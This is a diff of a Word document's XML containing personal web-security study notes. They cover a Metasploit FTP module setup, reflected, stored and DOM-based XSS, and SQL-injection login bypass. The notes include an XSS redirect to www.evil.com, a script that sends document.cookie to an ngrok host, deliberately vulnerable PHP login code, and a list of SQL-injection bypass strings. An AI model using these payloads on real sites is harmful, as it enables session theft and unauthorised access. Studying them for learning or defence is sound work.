-      <w:r>
-        <w:t xml:space="preserve">       The target address</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">   RPORT  21               </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>yes</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">       The target por</w:t>
+        <w:t xml:space="preserve">   RHOST  192.168.127.154  yes       The target address</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   RPORT  21               yes       The target por</w:t>
       </w:r>
       <w:r>
         <w:t>t</w:t>
@@ -6655,13 +6266,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Id  Name</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">   Id  Name</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -6874,15 +6480,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>&gt;  Injection</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> attack: XSS an attack resulting from an input validation failure that permits code to be input ... this unexpected code is then executed.</w:t>
+        <w:t>=&gt;  Injection attack: XSS an attack resulting from an input validation failure that permits code to be input ... this unexpected code is then executed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6929,13 +6527,8 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Why is XSS </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Possible?:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Why is XSS Possible?:</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -7048,29 +6641,12 @@
           <w:bCs/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">[ Reflected </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>XSS ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ Reflected cross-site scripting is also known as </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Non-persistent</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> cross-scripting. </w:t>
+        <w:t>[ Reflected XSS ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">+ Reflected cross-site scripting is also known as Non-persistent cross-scripting. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7147,15 +6723,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- The search may </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>returns</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> no results that match the input string.</w:t>
+        <w:t>- The search may returns no results that match the input string.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7165,15 +6733,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>- Use the payload: &lt;script&gt;alert('hacked</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>')&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>/script&gt;</w:t>
+        <w:t>- Use the payload: &lt;script&gt;alert('hacked')&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7262,23 +6822,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>https://www.target.com/bob/blender/issues?query=&lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>document.location</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = 'www.evil.com';&lt;/script&gt;</w:t>
+        <w:t>https://www.target.com/bob/blender/issues?query=&lt;script&gt;document.location = 'www.evil.com';&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -7342,17 +6886,8 @@
           <w:bCs/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">[ Stored </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>XSS ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>[ Stored XSS ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -7466,7 +7001,6 @@
         <w:t xml:space="preserve"> = </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -7475,7 +7009,6 @@
         <w:t>document.createElement</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -7540,7 +7073,6 @@
         <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -7549,7 +7081,6 @@
         <w:t>document.cookie</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -7566,21 +7097,12 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>document.body</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>.appendChild</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>document.body.appendChild</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -7736,23 +7258,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">&lt;script&gt;new </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Image(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>&lt;script&gt;new Image().</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7771,7 +7277,6 @@
         <w:t xml:space="preserve">="https://15fc-152-57-199-156.in.ngrok.io/?cookie=" + </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -7780,7 +7285,6 @@
         <w:t>document.cookie</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -7813,16 +7317,11 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">[ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">JavaScript </w:t>
+        <w:t xml:space="preserve">[ JavaScript </w:t>
       </w:r>
       <w:r>
         <w:t>]</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>- For the DOM-based XSS to take place, the JavaScript code of the web app takes input from a source that is controllable by the attacker, such as the URL in the browser’s tab.</w:t>
       </w:r>
@@ -7911,7 +7410,6 @@
         <w:t xml:space="preserve">2. Open chrome &amp; </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>visit:http</w:t>
       </w:r>
@@ -7919,7 +7417,6 @@
       <w:r>
         <w:t>://192.168.1.111/1.html</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -8009,12 +7506,10 @@
         <w:t xml:space="preserve"> = </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>location.search</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve">; // Extract the </w:t>
       </w:r>
@@ -8095,22 +7590,12 @@
         <w:tab/>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>document.write</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">('&lt;h1&gt; Hello, ' + name + </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>'!&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>/h1&gt;');</w:t>
+      <w:r>
+        <w:t>('&lt;h1&gt; Hello, ' + name + '!&lt;/h1&gt;');</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8291,6 +7776,1637 @@
           <w:bCs/>
         </w:rPr>
         <w:t>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Login Bypass Using SQL Injection:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````````````````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a very old trick.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>First let us see an example of piece of code that actually creates the Login Page vulnerable to this attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=$_POST['</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>'];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passwrd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=$_POST['</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passwrd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>'];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">$query="select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>username,pass</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> from users where username='$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>' and password='$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passwrd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>' limit 0,1";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>$result=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mysql_query</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>($query);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">$rows = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mysql_fetch_array</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>($result);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>if($rows)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>echo "You have Logged in successfully" ;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>create_session</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>else</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Echo "Better Luck Next time";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now as we can see the query is quoting the input with single quote, that means we have to use a single quote to close the first quote and then inject.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">So </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Inject ' or ''=' into the Query:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Logging in with following details:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Username : ' or ''='</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Password : ' or ''='</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>SQLQuery</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>username,pass</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> from users where username='' or ''='' and password='' or ''='' limit 0,1;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">so what </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> actually did is made the query to return true using the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>or</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>We can even try and comment out the query using any comment operator like using the following username and password.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Username : ' or 1--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Password :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SQLQuery</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>username,pass</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> from users where username='' or true--' and password='' or ''='' limit 0,1;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Here anything after -- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>wont</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> be executed which makes the query to be:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt; select </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>username,pass</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> from users where username='' or true;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Injections:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>___________________________________________________________________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>') or true--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>') or ('')=('</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>') or 1--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>') or ('x')=('</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or true--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or ""="</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or 1--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" or "x"="</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>") or true--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>") or ("")=("</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>") or 1--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>") or ("x")=("</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>')) or true--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>')) or ((''))=(('</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>')) or 1--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>')) or (('x'))=(('</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>'-'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
